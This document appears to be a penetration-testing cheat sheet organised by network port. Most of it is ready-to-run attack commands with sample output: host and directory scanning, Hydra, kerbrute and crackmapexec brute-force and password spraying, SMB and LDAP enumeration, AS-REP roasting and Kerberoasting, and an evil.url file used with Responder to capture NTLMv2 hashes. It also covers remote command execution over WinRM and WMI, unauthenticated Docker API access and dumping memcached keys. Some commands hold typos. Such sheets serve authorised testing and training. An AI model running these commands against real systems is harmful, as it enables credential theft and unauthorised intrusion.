- Port 21
- Port 22
- Port 23
- Port 25
- Port 80
- Port 88
- Port 110
- Port 111
- Port 139, 445
- Port 143
- Port 161, 162, 10161, 1016 (udp)
- Port 389
- Port 587
- Port 1433
- Port 2375
- Port 3218
- Port 3389
- Port 5672
- Port 5985
- Port 11211
- Port 15672
Note: If nmap is not executed with root access rights, it is required to used -sT parameter rather than -sS, otherwise all ports will be appear filtered.
nmap -sn -T4 10.0.0.0/24 -oN active-hosts
nmap -sS -sV -vv -Pn -p<PORT> <IP>
nmap -T4 -sS -A -p- <IP>
nmap -T4 -sS -sC -p- -Pn <IP>
nmap -T4 -sC -sV -p- --min-rate=1000 <IP>
nmap -T4 -sUV <IP>
nmap -T4 -A -sUV --top-ports 1000 -Pn <IP>
ls -l /usr/share/nmap/scripts/smb*
masscan -p21,22,443,8000-8100 10.0.0.0/24
knockpy domain.com -w /usr/share/wordlists/list --silent csv -o /path/to/new/folder
usage: knockpy [-h] [-v] [--no-local] [--no-remote] [--no-scan] [--no-http]
[--no-http-code CODE [CODE ...]] [--dns DNS] [-w WORDLIST]
[-o FOLDER] [-t SEC] [-th NUM] [--silent [{False,json,json-pretty,csv}]]
domain
dirb http://10.0.0.1/abc/ /usr/share/wordlists/dirb/big.txt
.html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl,.ini,.bak,.bck.
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/big.txt -t 30 -e -k -x .html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 200 (Length: 1474).
Solution - exclude the specific length : --exclude-length [size]
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 --exclude-length 1474
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 401 (Length: 98).
Solution - exclude the 401 status code : -b 404,401
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 -b 404,401
feroxbuster -u http://10.0.0.1 -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt --threads 30 -C 404,403
OR
feroxbuster -u http://mydomain.com -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt --threads 30 -C 404,403
gobuster fuzz -u http://10.0.0.1/user/FUZZ/condig -w /usr/share/wordlists/dirb/common.txt -e -t 20
ffuf -u http://mywebsite.com -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt -H 'Host: FUZZ.mywebsite.com' -fs 15949
nikto -host=http://example.com
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.0.1 -oX output.xml
searchsploit --nmap output.xml
https://dnsdumpster.com/
https://search.censys.io/
https://crt.sh/
https://archive.org/
https://www.robtex.com/
nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.0.0.1-254
#Hydra - Password spraying
hydra -s 21 -t 4 -L username.lst -p password01! 10.0.0.1 ftp
#Hydra - Bruteforce specific user
hydra -s 21 -t 4 -l admin -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ftp
#Hydra - Bruteforce common login:passord
hydra -s 21 -C /home/kali/wordlists/legion/ftp-betterdefaultpasslist.txt -u -f 10.0.0.1 ftp
#Medusa
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
➤ Connection
ftp 10.0.0.1 21
➤ Upload a file (from the folder where the shell has been started)
binary
put <filename>
➤ Download a file (to the folder where the shell has been started)
binary
get <filename>
ex:
get test.zip
get "Access Control.zip"
➤ 229 Entering Extended Passive Mode (|||26826|)
#Hydra - Bruteforce specific user
hydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ssh
#Hydra - Password spraying
hydra -L user.txt -p password01! 10.0.0.1 ssh
#Hydra - Full bruteforce
hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh
ssh lexis@10.0.0.1
ssh lexis@10.0.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh lexis@10.0.0.1
lexis@10.0.0.1's password:
Last login: Thu Feb 24 08:42:29 2022 from 192.168.1.1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ E R R O R @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The .bash_profile file for the server you are attempting to
connect to has encountered an error. This could mean that
your access has been disabled. Please contact a system
administrator to restore your access to this server.
Connection to 10.0.0.1
ssh -t lexis@10.0.0.1 /bin/sh
lexis@10.0.0.1's password:
sh-05$
chmod 600 id_rsa
ssh -i id_rsa kiosec@10.0.0.1
Authentication login page can be take a moment to appears (1min)
#From Kali linux
Kiosec@cyberlab:/home/kali>#telnet 10.10.0.1
Trying 10.10.0.1...
Connected to 10.10.0.1.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
login:security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
| Command | Description |
|---|---|
HELO |
Used to initiate an SMTP conversation with an email server. The command is followed by an IP address or a domain name (e.g., HELO 10.1.2.14). |
EHLO |
Used to initiate a conversation with an Extended SMTP (ESMTP) server. Works the same way as HELO, but for ESMTP. |
STARTTLS |
Used to start a secure TLS (Transport Layer Security) connection to an email server. |
RCPT |
Used to specify the recipient's email address. |
DATA |
Used to initiate the transfer of the email message content. |
RSET |
Used to reset (cancel) the current email transaction. |
MAIL |
Used to specify the sender's email address. |
QUIT |
Used to close the connection with the server. |
HELP |
Used to display a help menu (if available). |
AUTH |
Used to authenticate a client to the email server. |
VRFY |
Used to verify whether a user's email mailbox exists. |
EXPN |
Used to request or expand a mailing list on the remote server. |
telnet 10.0.0.1 25
Trying 10.0.0.1
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.local ESMTP Postfix (Debian/GNU)
VRFY {username}
➤ Valid username
252 2.0.0 useradm
➤ Invalid username
550 5.1.1 <admin>: Recipient address rejected:User unknown in local recipient table
wpscan --url http://10.0.0.1/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --api-token {token-api}
Service : kerberos-sec Microsoft Windows Kerberos
# Install kerbrute : https://github.com/ropnop/kerbrute/releases
# Think to add the domain to the /etc/host -> echo '@IP @domain' >> /etc/hosts (example echo '10.0.0.1 cyberlab.local' >> /etc/hosts)
# Enumerate the user
root@kali:~# kerbrute userenum -d <domain_name> --dc <dns_domain_name> userlist.txt -t 100
Important note : Once a list of user founded, try to obtain the TGT ticket (ASREPPROASTING through GetNPusers.py)
# Password Spraying
root@kali:~# ./kerbrute_linux_amd64 passwordspray -d <domain_name> domain-users.txt Password123
rpcinfo -p 10.0.0.1
rpcclient -U "" 10.0.0.1
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.0.1
enum4linux -A 10.0.0.1
enum4linux 10.0.0.1 -u anonymous
nmap -p 445,139 -Pn --script smb-protocols.nse 10.0.0.1
nmap -v -p 139,445 --script=smb-os-discovery 10.0.0.1
nmap -v -p 139,445 --script=smb* 10.0.0.1
nmap -p 445,139 -Pn --script=smb-vuln-*.nse 10.0.0.1 // Do not return all vuln because some script needs specific args
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.0.0.1
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 10.0.0.1
#Enumerate the shares
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.0.1
smbclient -L \\10.0.0.1
smbclient -L 10.0.0.1 -U anonymous
smbclient -L 10.0.0.1 --options='client min protocol=NT1'
smbclient \\\\10.10.155.41\\<share_name>
smbclient \\\\10.10.155.41\\<share_name> -U username
#Be careful to access a folder that you are minumum a read only permission. (check with smbmap before)
#In the example below, HR is a folder with read only permission
root@ip-10-10-148-27:~# smbclient \\\\10.10.155.41\\HR
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHS 0 Sat Sep 15 08:28:48 2018
atlbitbucket D 0 Thu Mar 11 22:53:06 2021
<...>
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Administrator\*
STATUS_STOPPED_ON_SYMLINK listing \All Users\*
STATUS_STOPPED_ON_SYMLINK listing \*
smb: \All Users\>
smbmap -H 10.0.0.1
➤ Reculsive enumeration
smbmap -H 10.0.0.1 -r
➤ Recursive enumeration on a specific folder
smbmap -H 10.0.0.1 -R 'Replication\active.htb'
➤ Authenticated enumeration
smbmap -H 10.0.0.1 -u 'SVC_TGS' -p 'mySuperStrongPassword!' -r
➤ Download a file
smbmap -H 10.10.0.1 --download '.\Users\SVC_TGS\Desktop\user.txt'
➤ If error ‘[!] Authentication error on 10.0.0.1’ try with a fake user -u ‘123’
smbmap -H 10.0.0.1 -R -u ‘123’
If the following error appear "protocol negotiation failed : NT_STATUS_CONNECTION_DISCONNECTED", it's probably due to the old smb version of the victim.
Solution: Intercept the trafic of the command ‘smbclient -L \\<IP> with wireshark and search the negotiation of the smb version.
smb://<ip>/<folder>
#Example with the folder named anonymous
smbget -R smb://10.0.0.1/anonymous
#Example with a specific file
smbget -r smb://10.0.0.1/folder/file
press enter
mount -t cifs //10.0.0.1/share /mnt/share
mount -t cifs -o "username=user,password=password" //10.0.0.1/share /mnt/share
Lookupsid is a tool that allows you to enumerate user and group Security Identifiers (SIDs) on a Windows system. Each user and group account in Windows has a unique SID, and by obtaining these SIDs, you can gather valuable information about the system's user accounts, aiding in understanding the network's structure and potential security risks. The tool uses the SMB (Server Message Block) protocol, which is commonly used for Windows networking, to facilitate communication.
#Command : python lookupsid.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>
impacket-lookupsid 'mywindows.htb/guest'@mywindows.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: MYWINDOWS\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MYWINDOWS\Administrator (SidTypeUser)
501: MYWINDOWS\Guest (SidTypeUser)
...
1109: MYWINDOWS\Dev Support (SidTypeGroup)
1601: MYWINDOWS\Totoro (SidTypeUser)
1601: MYWINDOWS\Kiosec (SidTypeUser)
hydra -L users.txt -P passs.txt smb://10.0.0.1 -t 4
hydra -L username.txt -P password.txt 10.0.0.1 smb -V
crackmapexec smb <IP> -d <DOMAIN> -u users.txt -p 'PASSWORD'
→ EX: crackmapexec smb 10.0.0.1 -d frabricorp -u users.txt -p '123Soleil'
STATUS_PASSWORD_MUST_CHANGE : correct password but has expired and needs to be changed before logging in
STATUS_LOGIN_FAILURE : incorrect password
➤ Prerequisite : Write access to a smb folder
Check if is it possible to write in a folder
- echo "this is a test" >> test.txt
- upload the file in the smb folder using put command
➤ Create the evil.url file
Write in a evil.url file the following content. Replace the tun0 by the ip adress (tun0 or etho0, etc.)
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=abcdef
IconFile=\\<YOUR tun0 IP>\%USERNAME%.icon
IconIndex=1
➤ Prepate our responder listener
sudo responder -I tun0 -wv
➤ Put the evil.url in the smb share and waiting ntlmv2 hash if the document is open
ex :
[SMB] NTLMv2-SSP Client : 192.168.58.172
[SMB] NTLMv2-SSP Username : CYBERLAB\kiosec
[SMB] NTLMv2-SSP Hash : kiosec::CYBERLAB:09de3ec911a58870:0D4F3A68A10DAADDF7B4382A16916822:01010000000000000059D801EE14DC013815FA61C58073A80000000002000[REDACTED]0000010000000020000089AA92A8AA17227674842877BD92C0EEF101C15360BF57E99844B804AA2DA3E00A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00350038000000000000000000
Keep in file only:
kiosec::CYBERLAB:09de3ec911a58870:0D4F3A68A10DAADDF7B4382A16916822:01010000000000000059D801EE14DC013815FA61C58073A80000000002000[REDACTED]0000010000000020000089AA92A8AA17227674842877BD92C0EEF101C15360BF57E99844B804AA2DA3E00A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00350038000000000000000000
➤ Try to crack the hash
See : https://github.com/Kiosec/Cracking/blob/main/README.md#netntlmv2ntlmv2-hash
➤ Using snmpbulkwalk
$ snmpbulkwalk -c public -v2c 10.0.0.1 .
➤ using snmp-chek (Prefered to detect vulnerable running services )
#Example with clamav:
kali@kali:~$ snmp-check 10.0.0.1
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.0.0.1 using SNMPv1 and community 'public'
[...]
3765 runnable clamd /usr/local/sbin/clamd
3767 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3776 runnable inetd /usr/sbin/inetd
nmap -n -sV --script "ldap* and not brute" <IP>
Explanation : https://blog.netwrix.com/2022/12/13/using-ldap-ping-to-enumerate-active-directory-users/ Github : https://github.com/lkarlslund/ldapnomnom
┌─[✗]─[root@htb-tuswhlsdcc]─[/home/kiosec/Documents]
└──╼ #./ldapnomnom-linux-x64 --input xato-net-10-million-usernames.txt --server test.com --maxservers 32 --parallel 16
__ ____ _____ _____
| | | \| _ | _ |___ ___ _____ ___ ___ _____
| |__| | | | __| | . | | | . | |
|_____|____/|__|__|__| |_|_|___|_|_|_|_|_|___|_|_|_|
prerelease
IN SPACE NO ONE CAN HEAR YOU NOM NOM USERNAMES
guest
administrator
nxc ldap 10.129.219.77 -u '' -p '' --users
# With Credentials
ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>
# Without credentials
ldapdomaindump ldap://<IP>
➤ Anonymous connection attempt (-x). With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -h 10.129.136.235 -p 389 -x -b "dc=htb,dc=local"
ldapsearch -H ldap://machine.htb:389/ -x -s base -b '' "(objectClass=*)" "*" +
➤ Enumerate all AD users (https://github.com/ropnop/windapsearch)
./windapsearch.py -d test.com --dc-ip 10.0.0.1 -U
➤ Enumerate all objects in the domain
./windapsearch.py -d test.com --dc-ip 10.0.0.1 --custom "objectClass=*"
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The service alfresco needs Kerberos pre-authentication to be disabled. This means that we can request the encrypted TGT for this user.
➤ Request a TGT ticket
./GetNPUsers.py DOMAIN/USERNAME -dc-ip <IP> -no-pass
➤ Next steps: Crack the obtained TGT ticket then used is again port 5985 using evil-winrm
➤ Authenticated research. With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -x -h <IP> -p <PORT> -D 'USERNAME' -w 'PASSWORD' -b "dc=DOMAIN,dc=DOMAIN2" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
OR
./GetADUsers.py -all DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetADUsers.py -all domain.com/svc_tgs -dc-ip 10.0.0.1
OR
windapsearch.py -u "DOMAIN\USERNAME" --dc-ip <IP> -U
→ EX: ./windapsearch.py -u "FABRICORP\harry" --dc-ip 10.10.10.193 -U
➤ Verify if a SPN exist
ldapsearch -x -h 10.0.0.1 -p 389 -D 'SVC_TGS' -w'password' -b "dc=domain,dc=com" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
OR
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1
→ OUTPUT: active/CIFS:445 -> a SPN exist
➤ Request a SPN token
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP> -request
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1 -request
➤ Wmiexec equivalent to psexec
./wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
→ EX: ./wmiexec.py domain.com/administrator:password@10.0.0.1
sqsh -U sa -P password -S 10.0.0.1:1433 -D mydb
go -m pretty
Default docker port
nmap -sV -p 2375 10.0.0.1
curl http://10.0.0.1:2375/version
{
"Platform": {
"Name": "Docker Engine - Community"
},
"Components": [
{
"Name": "Engine",
"Version": "20.10.20",
"Details": {
"ApiVersion": "1.41",
"Arch": "amd64",
"BuildTime": "2022-10-18T18:18:12.000000000+00:00",
"Experimental": "false",
"GitCommit": "03df974",
"GoVersion": "go1.18.7",
"KernelVersion": "5.15.0-1022-aws",
"MinAPIVersion": "1.12",
"Os": "linux"
}]
}
# To test if we can run commands, we'll list the containers on the target
docker -H tcp://10.0.0.1:2375 ps
Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support. (From here).
SPOSE scanner Alternatively, the Squid Pivoting Open Port Scanner (https://github.com/aancw/spose) can be used.
git clone https://github.com/aancw/spose.git
python spose.py --proxy http://$IP:3128 --target $IP
You can configure foxyproxy to access to port through navigator (e.g., 8080).
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.0.1
hydra -L user.txt -P pass.txt 10.0.0.1 rdp
ncrack -vv --user administrator -P passwords.txt rdp://10.0.0.1,CL=1
rdesktop 10.0.0.1
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info 10.0.0.1
import amqp
conn = amqp.connection.Connection(host="10.0.0.1", port=5672, virtual_host="/")
conn.connect()
for k,v in conn.server_properties.items():
print(k,v)
Details : https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Check a pair of credentials (Password) and execute a command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Check a pair of credentials (Hash) and execute a PS command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i <IP> -u <USERNAME> -p <PASSWORD>
OR
gem evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>
ex:
evil-winrm -i 10.0.0.1 -u svc-securiry --password 'mystr0ngpasssword!'
nmap -n -sV --script memcached-info -p 11211 10.0.0.1
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
➤ Install and use memcdump
mencdump --verbose --debug --servers=10.0.0.1 | tee keys.lst
➤ Execute the script
#!/bin/bash
file="keys.lst" #file which contains the keys
while read -r line
do
echo "get $line | nc -vn -w 1 10.0.0.1 112111 > $line.txt
done < $file
The default credentials are guest:guest